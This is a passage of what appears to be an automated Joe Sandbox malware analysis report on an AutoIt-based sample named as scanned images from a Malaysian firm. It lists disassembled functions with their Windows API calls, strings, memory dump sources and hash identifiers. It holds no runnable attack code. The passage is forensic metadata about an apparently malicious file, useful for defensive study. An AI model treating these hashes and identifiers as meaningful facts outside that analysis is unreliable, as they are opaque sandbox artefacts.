                                                        • Instruction ID: ecdd368d154037157607217a390467b20845ef7822b57acd7489b68b11b2b78f
                                                        • Opcode Fuzzy Hash: 9beff3e6f58235128241479dbbe6614b111f9d315f54ed89a1826f57af1eefdd
                                                        • Instruction Fuzzy Hash: 47E0D8792043057FF6255FA19C4AEA7372CDB59751F118039B304450E0EFA28C506564
                                                        Function 00A851CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: de3470d74b172f5b7478ff5da30d9e8eca05610305c9522690204616080b3964
                                                        • Instruction ID: ce7f1cb07690d31f43b7409cf7a40fab6534a3fb8f925eaae93379e6215d0ee5
                                                        • Opcode Fuzzy Hash: de3470d74b172f5b7478ff5da30d9e8eca05610305c9522690204616080b3964
                                                        • Instruction Fuzzy Hash: 4CE02B329002292AD710D6D59C45AA7F7ACEB41721F000157FD10D3050E560990587E0
                                                        Function 00A781BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A781CA
                                                          • Part of subcall function 00A43598: _doexit.LIBCMT ref: 00A435A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: 5bb7d4c1da29d66ee93414786131c29789f41f9f656c8c983d3bc9d9f7f36e9d
                                                        • Instruction ID: 71521f6b424dcc447e96325406cd575d9f76c777634ea42ee7f2ea623af3862b
                                                        • Opcode Fuzzy Hash: 5bb7d4c1da29d66ee93414786131c29789f41f9f656c8c983d3bc9d9f7f36e9d
                                                        • Instruction Fuzzy Hash: DBD02B323C531836D21433E82D0BFC63A4C4F05B11F404422BB08551C38ED584D242D9
                                                        Function 00A5B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A5B564: _memset.LIBCMT ref: 00A5B571
                                                          • Part of subcall function 00A40B84: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A5B540,?,?,?,00A2100A), ref: 00A40B89
                                                        • IsDebuggerPresent.KERNEL32(?,?,?,00A2100A), ref: 00A5B544
                                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A2100A), ref: 00A5B553
                                                        Strings
                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A5B54E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                        • API String ID: 3158253471-631824599
                                                        • Opcode ID: 24af5bb398f91f8004a7608fc2e8ef16c54c3e019d7718ccf39adb5beafb2d7b
                                                        • Instruction ID: 766d7d2226e2f5a546832e675edb81a76d46f46918dc9cd86c15576901730460
                                                        • Opcode Fuzzy Hash: 24af5bb398f91f8004a7608fc2e8ef16c54c3e019d7718ccf39adb5beafb2d7b
                                                        • Instruction Fuzzy Hash: E6E06D706103118FD725DFA8E504B427BE0BB10746F00892CE857C6691E7B4D409CB71
                                                        Function 00AA5BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00AA5BF5
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00AA5C08
                                                          • Part of subcall function 00A854E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 897829ea03741627f4e2fc5d71ea01c84f8aa5c35449aae254141e5b0aa66a94
                                                        • Instruction ID: 57a20458417d93d563e3e6cb9e5c05fcb20d45670d0a76c57cb65986b5bb6919
                                                        • Opcode Fuzzy Hash: 897829ea03741627f4e2fc5d71ea01c84f8aa5c35449aae254141e5b0aa66a94
                                                        • Instruction Fuzzy Hash: 59D0C931788312BAE768BBF0AC4BF976A64AB11B51F000825B656AA1D0DAE46801C654
                                                        Function 00A798BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A798CB
                                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 00A798D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: @U=u
                                                        • API String ID: 3850602802-2594219639
                                                        • Opcode ID: 2627bbed889f8028b3c78092bab4bc3afc997237e53417349f4c9a48c2e60d27
                                                        • Instruction ID: 6f24a9edf5b06dcf39a946930c383f29efdd83bc586e22340ec840c5d806468f
                                                        • Opcode Fuzzy Hash: 2627bbed889f8028b3c78092bab4bc3afc997237e53417349f4c9a48c2e60d27
                                                        • Instruction Fuzzy Hash: 51C002311411C1BAEA255BB7AC0DD973E3DE7CBF52715016CB211950B587650096D664